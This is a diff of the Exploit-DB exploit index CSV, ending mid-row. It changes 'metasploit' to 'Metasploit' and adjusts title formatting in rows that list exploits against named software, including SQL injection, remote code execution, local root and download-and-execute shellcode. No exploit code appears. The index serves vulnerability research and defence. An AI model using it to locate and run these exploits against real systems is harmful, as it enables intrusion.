-24159,platforms/linux/remote/24159.rb,"Nagios3 history.cgi Host Command Execution",2013-01-16,metasploit,linux,remote,0 +24159,platforms/linux/remote/24159.rb,"Nagios3 history.cgi Host Command Execution",2013-01-16,Metasploit,linux,remote,0 24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0 24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 beta 2 show.asp show Parameter XSS",2004-06-01,"Oliver Karow",windows,remote,0 24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 beta 2 showperf.asp title Parameter XSS",2004-06-01,"Oliver Karow",windows,remote,0 @@ -21456,11 +21456,11 @@ id,file,description,date,author,platform,type,port 24266,platforms/windows/remote/24266.txt,"Microsoft Internet Explorer 5.0.1 Popup.show Mouse Event Hijacking",2004-07-12,Paul,windows,remote,0 24267,platforms/windows/dos/24267.txt,"Microsoft Internet Explorer 6.0 JavaScript Null Pointer Exception Denial of Service",2004-07-12,"Berend-Jan Wever",windows,dos,0 24268,platforms/multiple/remote/24268.txt,"Code-Crafters Ability Mail Server 1.18 errormsg Parameter XSS",2004-07-12,dr_insane,multiple,remote,0 -24269,platforms/php/webapps/24269.txt,"NConf 1.3 (detail.php detail_admin_items.php id parameter) SQL Injection",2013-01-21,haidao,php,webapps,0 +24269,platforms/php/webapps/24269.txt,"NConf 1.3 - (detail.php detail_admin_items.php id parameter) SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 Blog_Exec.php Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps,0 -24272,platforms/multiple/remote/24272.rb,"Jenkins Script-Console Java Execution",2013-01-21,metasploit,multiple,remote,0 -24273,platforms/php/remote/24273.rb,"PHP-Charts 1.0 - PHP Code Execution",2013-01-21,metasploit,php,remote,0 +24272,platforms/multiple/remote/24272.rb,"Jenkins Script-Console Java Execution",2013-01-21,Metasploit,multiple,remote,0 +24273,platforms/php/remote/24273.rb,"PHP-Charts 1.0 - PHP Code Execution",2013-01-21,Metasploit,php,remote,0 24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x Viewtopic.php PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps,0 24275,platforms/unix/dos/24275.txt,"IBM Lotus Notes 6.0/6.5 - Multiple Java Applet Vulnerabilities",2004-07-13,"Jouko Pynnonen",unix,dos,0 24276,platforms/windows/remote/24276.txt,"Mozilla Browser 0.9/1.x Cache File - Multiple Vulnerabilities",2004-07-13,"Mind Warper",windows,remote,0 @@ -21496,9 +21496,9 @@ id,file,description,date,author,platform,type,port 24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos,0 24306,platforms/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module Directory Traversal",2004-07-23,sullo@cirt.net,php,webapps,0 24307,platforms/php/webapps/24307.txt,"PostNuke 0.7x Install Script Administrator Password Disclosure",2004-07-24,hellsink,php,webapps,0 -24308,platforms/multiple/remote/24308.rb,"Java Applet Method Handle Remote Code Execution",2013-01-24,metasploit,multiple,remote,0 -24309,platforms/java/remote/24309.rb,"Java Applet AverageRangeStatisticImpl Remote Code Execution",2013-01-24,metasploit,java,remote,0 -24310,platforms/unix/remote/24310.rb,"ZoneMinder Video Server packageControl Command Execution",2013-01-24,metasploit,unix,remote,0 +24308,platforms/multiple/remote/24308.rb,"Java Applet Method Handle Remote Code Execution",2013-01-24,Metasploit,multiple,remote,0 +24309,platforms/java/remote/24309.rb,"Java Applet AverageRangeStatisticImpl Remote Code Execution",2013-01-24,Metasploit,java,remote,0 +24310,platforms/unix/remote/24310.rb,"ZoneMinder Video Server packageControl Command Execution",2013-01-24,Metasploit,unix,remote,0 24311,platforms/php/webapps/24311.txt,"EasyIns Stadtportal 4.0 Site Parameter Remote File Include",2004-07-24,"Francisco Alisson",php,webapps,0 24312,platforms/linux/remote/24312.html,"Mozilla Browser 0.8/0.9/1.x Refresh Security Property Spoofing",2004-07-26,E.Kellinis,linux,remote,0 24313,platforms/asp/webapps/24313.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE-NAME]_search.asp Typeen Parameter XSS",2004-07-26,"Ferruh Mavituna",asp,webapps,0 @@ -21509,13 +21509,13 @@ id,file,description,date,author,platform,type,port 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0 24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection",2013-01-24,RealGame,multiple,webapps,0 -24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0 -24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0 -24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,metasploit,multiple,remote,0 +24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution",2013-01-07,Metasploit,multiple,remote,0 +24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,Metasploit,multiple,remote,0 +24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,Metasploit,multiple,remote,0 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting",2004-07-26,DarkBicho,php,webapps,0 24325,platforms/multiple/remote/24325.html,"Opera Web Browser 7.53 Location Replace URI Obfuscation Weakness",2004-07-27,"bitlance winter",multiple,remote,0 -24326,platforms/cgi/remote/24326.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote,0 -24327,platforms/cgi/remote/24327.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",cgi,remote,0 +24326,platforms/cgi/remote/24326.txt,"RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote,0 +24327,platforms/cgi/remote/24327.txt,"RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",cgi,remote,0 24328,platforms/windows/remote/24328.txt,"Microsoft Internet Explorer 5.0.1 Style Tag Comment Memory Corruption",2004-07-08,"Phuong Nguyen",windows,remote,0 24329,platforms/php/webapps/24329.txt,"AntiBoard 0.6/0.7 antiboard.php Multiple Parameter SQL Injection",2004-07-28,"Josh Gilmour",php,webapps,0 24330,platforms/php/webapps/24330.txt,"AntiBoard 0.6/0.7 antiboard.php feedback Parameter XSS",2004-07-28,"Josh Gilmour",php,webapps,0 @@ -21552,7 +21552,7 @@ id,file,description,date,author,platform,type,port 24363,platforms/windows/remote/24363.txt,"clearswift mimesweeper for Web 4.0/5.0 - Directory Traversal",2004-07-11,"Kroma Pierre",windows,remote,0 24364,platforms/php/webapps/24364.txt,"WordPress SolveMedia 1.1.0 - CSRF",2013-01-25,"Junaid Hussain",php,webapps,0 24365,platforms/php/webapps/24365.txt,"ImageCMS 4.0.0b - Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",php,webapps,0 -24366,platforms/windows/local/24366.rb,"Windows Manage Memory Payload Injection",2013-01-25,metasploit,windows,local,0 +24366,platforms/windows/local/24366.rb,"Windows Manage Memory Payload Injection",2013-01-25,Metasploit,windows,local,0 24367,platforms/php/webapps/24367.txt,"IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities",2004-08-11,ShineShadow,php,webapps,0 24368,platforms/asp/webapps/24368.txt,"MapInfo Discovery 1.0/1.1 - Remote Log File Access Information Disclosure",2004-07-15,anonymous,asp,webapps,0 24369,platforms/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 MapFrame.asp mapname Parameter XSS",2004-07-15,anonymous,asp,webapps,0 @@ -21617,34 +21617,34 @@ id,file,description,date,author,platform,type,port 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php L param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 -24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools - Format String (1)",2013-02-06,metasploit,windows,remote,0 -24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,metasploit,multiple,remote,0 +24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0 +24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps,0 24437,platforms/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos,0 -24438,platforms/php/webapps/24438.txt,"DataLife Engine 9.7 (preview.php) PHP Code Injection",2013-01-28,EgiX,php,webapps,0 +24438,platforms/php/webapps/24438.txt,"DataLife Engine 9.7 - (preview.php) PHP Code Injection",2013-01-28,EgiX,php,webapps,0 24439,platforms/freebsd/webapps/24439.txt,"PFsense UTM Platform 2.0.1 - XSS",2013-01-29,"Dimitris Strevinas",freebsd,webapps,0 24442,platforms/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",hardware,webapps,0 24443,platforms/hardware/webapps/24443.txt,"Buffalo TeraStation TS-Series - Multiple Vulnerabilities",2013-01-31,"Andrea Fabrizi",hardware,webapps,0 -24444,platforms/php/remote/24444.rb,"DataLife Engine preview.php PHP Code Injection",2013-02-01,metasploit,php,remote,0 +24444,platforms/php/remote/24444.rb,"DataLife Engine preview.php PHP Code Injection",2013-02-01,Metasploit,php,remote,0 24445,platforms/php/webapps/24445.txt,"Simple Machine Forum 2.0.x < 2.0.4 File Disclosure/Path Traversal",2013-02-04,NightlyDev,php,webapps,0 24448,platforms/windows/dos/24448.svg,"Opera SVG Use After Free",2013-02-05,Cons0ul,windows,dos,0 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 ftpd Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - (config.php question parameter) SQL Injection",2013-02-05,kallimero,php,webapps,0 -24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 and DIR-300 (rev B) Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 +24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 and DIR-300 - (rev B) Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 -24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK unique_service_name() Remote Code Execution",2013-02-05,metasploit,unix,remote,0 +24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK unique_service_name() Remote Code Execution",2013-02-05,Metasploit,unix,remote,0 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0 24459,platforms/linux/dos/24459.sh,"Linux Kernel <= 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,dos,0 -24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools - Format String (2)",2013-02-12,metasploit,windows,remote,0 +24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 -24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 (cubecart.class.php) PHP Object Injection",2013-02-07,EgiX,php,webapps,0 +24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 - (cubecart.class.php) PHP Object Injection",2013-02-07,EgiX,php,webapps,0 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0 @@ -21665,9 +21665,9 @@ id,file,description,date,author,platform,type,port 24485,platforms/windows/dos/24485.txt,"Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0 24486,platforms/multiple/dos/24486.txt,"Google Chrome Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0 24487,platforms/linux/dos/24487.py,"cURL Buffer Overflow",2013-02-11,Volema,linux,dos,0 -24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 +24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Remote Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script (index.php id param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0 -24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",2013-02-12,metasploit,windows,remote,0 +24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0 24494,platforms/hardware/remote/24494.rb,"Polycom HDX Telnet Authorization Bypass",2013-02-14,"Paul Haas",hardware,remote,23 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)",2013-02-14,"Scott Bell",windows,remote,0 @@ -21677,7 +21677,7 @@ id,file,description,date,author,platform,type,port 24499,platforms/hardware/webapps/24499.txt,"Raidsonic IB-NAS5220 and IB-NAS4220-B - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 24500,platforms/windows/webapps/24500.txt,"Sonicwall OEM Scrutinizer 9.5.2 - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,windows,webapps,0 24501,platforms/php/webapps/24501.txt,"Ultra Light Forum Persistant XSS",2013-02-14,"cr4wl3r ",php,webapps,0 -24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin URL Processing Buffer Overflow",2013-02-14,metasploit,windows,remote,0 +24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin URL Processing Buffer Overflow",2013-02-14,Metasploit,windows,remote,0 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - (.pxs) Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 @@ -21691,28 +21691,28 @@ id,file,description,date,author,platform,type,port 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0 -24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0 -24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0 -24529,platforms/php/remote/24529.rb,"OpenEMR - PHP File Upload",2013-02-20,metasploit,php,remote,0 +24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,Metasploit,windows,remote,0 +24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,Metasploit,windows,remote,0 +24529,platforms/php/remote/24529.rb,"OpenEMR - PHP File Upload",2013-02-20,Metasploit,php,remote,0 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0 -24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,metasploit,windows,remote,0 +24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,Metasploit,windows,remote,0 24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script (Auth Bypass) SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple XSS Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 24537,platforms/php/webapps/24537.txt,"phpMyRecipes 1.2.2 (viewrecipe.php r_id param) - SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0 -24539,platforms/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (2)",2013-02-25,metasploit,multiple,remote,0 +24539,platforms/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (2)",2013-02-25,Metasploit,multiple,remote,0 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection Exploit",2013-02-26,"cr4wl3r ",php,webapps,0 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection",2013-02-26,L0n3ly-H34rT,php,webapps,0 24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0 24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 (edit_photos.php title param) - XSS",2013-02-26,LiquidWorm,php,webapps,0 24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 -24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload",2013-02-26,metasploit,php,remote,0 -24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 & 1.8.12 - Arbitrary File Upload",2013-02-26,metasploit,php,remote,0 -24549,platforms/php/remote/24549.rb,"PolarPearCMS PHP File Upload",2013-02-26,metasploit,php,remote,0 +24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 +24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 & 1.8.12 - Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 +24549,platforms/php/remote/24549.rb,"PolarPearCMS PHP File Upload",2013-02-26,Metasploit,php,remote,0 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 -24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 (highlight.php) PHP Object Injection",2013-02-27,EgiX,php,webapps,0 +24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 - (highlight.php) PHP Object Injection",2013-02-27,EgiX,php,webapps,0 24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0 24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Local Root (1)",2013-02-27,sd,linux,local,0 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - (.m3u) Buffer Overflow",2013-03-01,metacom,windows,dos,0 @@ -21739,8 +21739,8 @@ id,file,description,date,author,platform,type,port 24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 ladder-log.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24633,platforms/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 view-profile.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24634,platforms/windows/dos/24634.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (1)",2004-09-27,Coolio,windows,dos,0 -24578,platforms/osx/local/24578.rb,"Setuid Tunnelblick Privilege Escalation",2013-03-05,metasploit,osx,local,0 -24579,platforms/osx/local/24579.rb,"Viscosity setuid-set ViscosityHelper Privilege Escalation",2013-03-05,metasploit,osx,local,0 +24578,platforms/osx/local/24578.rb,"Setuid Tunnelblick Privilege Escalation",2013-03-05,Metasploit,osx,local,0 +24579,platforms/osx/local/24579.rb,"Viscosity setuid-set ViscosityHelper Privilege Escalation",2013-03-05,Metasploit,osx,local,0 24580,platforms/windows/dos/24580.txt,"Kaspersky Internet Security 2013 - Denial of Service",2013-03-05,"Marc Heuse",windows,dos,0 24581,platforms/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 Staffile Information Disclosure",2004-09-07,masud_libra,multiple,remote,0 24582,platforms/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 Custchoice.php Update Your Password Action Information Disclosure",2004-09-07,masud_libra,php,webapps,0 @@ -21867,7 +21867,7 @@ id,file,description,date,author,platform,type,port 24707,platforms/multiple/remote/24707.txt,"Google Desktop Search Remote Cross-Site Scripting",2004-10-26,"Salvatore Aranzulla",multiple,remote,0 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0 24889,platforms/php/webapps/24889.txt,"WordPress Mathjax Latex Plugin 1.1 - CSRF",2013-03-26,"Junaid Hussain",php,webapps,0 -24890,platforms/windows/remote/24890.rb,"ActFax 5.01 RAW Server Buffer Overflow",2013-03-26,metasploit,windows,remote,0 +24890,platforms/windows/remote/24890.rb,"ActFax 5.01 RAW Server Buffer Overflow",2013-03-26,Metasploit,windows,remote,0 24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 24711,platforms/php/remote/24711.php,"PHP 4.x/5 cURL Open_Basedir Restriction Bypass",2004-10-28,FraMe,php,remote,0 24712,platforms/windows/remote/24712.txt,"Microsoft Internet Explorer 6.0 TABLE Status Bar URI Obfuscation Weakness",2004-10-28,"Benjamin Tobias Franz",windows,remote,0 @@ -21902,7 +21902,7 @@ id,file,description,date,author,platform,type,port 24742,platforms/php/webapps/24742.txt,"Web Cookbook - Multiple SQL Injection Vulnerabilities",2013-03-13,"Saadat Ullah",php,webapps,0 24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow",2013-03-13,coolkaveh,windows,dos,0 24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 < 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0 -24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,metasploit,windows,remote,0 +24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,Metasploit,windows,remote,0 24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Root Exploit (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0 24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0 24748,platforms/php/webapps/24748.txt,"event calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 @@ -22026,9 +22026,9 @@ id,file,description,date,author,platform,type,port 24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 -24874,platforms/multiple/remote/24874.rb,"Apache Struts ParametersInterceptor Remote Code Execution",2013-03-22,metasploit,multiple,remote,0 -24875,platforms/windows/remote/24875.rb,"Sami FTP Server LIST Command Buffer Overflow",2013-03-22,metasploit,windows,remote,0 -24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream - Buffer Overflow",2013-03-22,metasploit,windows,remote,0 +24874,platforms/multiple/remote/24874.rb,"Apache Struts ParametersInterceptor Remote Code Execution",2013-03-22,Metasploit,multiple,remote,0 +24875,platforms/windows/remote/24875.rb,"Sami FTP Server LIST Command Buffer Overflow",2013-03-22,Metasploit,windows,remote,0 +24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream - Buffer Overflow",2013-03-22,Metasploit,windows,remote,0 24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 (filemanager.php) - Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 24879,platforms/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQLi",2013-03-25,"Saadi Siddiqui",php,webapps,0 24880,platforms/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow",2013-03-25,G0li47h,windows,dos,0 @@ -22038,9 +22038,9 @@ id,file,description,date,author,platform,type,port 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation (0Day)",2013-03-25,Dr_IDE,windows,local,0 24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Remote (0Day)",2013-03-25,Dr_IDE,windows,local,0 24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - (ActUWzd.dll (WzTitle)) Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 -24887,platforms/windows/remote/24887.rb,"KingView Log File Parsing Buffer Overflow",2013-03-25,metasploit,windows,remote,0 -24888,platforms/linux/remote/24888.rb,"Mutiny Remote Command Execution",2013-03-25,metasploit,linux,remote,0 -24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center Arbitrary File Upload",2013-03-26,metasploit,windows,remote,0 +24887,platforms/windows/remote/24887.rb,"KingView Log File Parsing Buffer Overflow",2013-03-25,Metasploit,windows,remote,0 +24888,platforms/linux/remote/24888.rb,"Mutiny Remote Command Execution",2013-03-25,Metasploit,linux,remote,0 +24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center Arbitrary File Upload",2013-03-26,Metasploit,windows,remote,0 24892,platforms/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",hardware,remote,0 24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b (awards.php id param) - Blind SQL 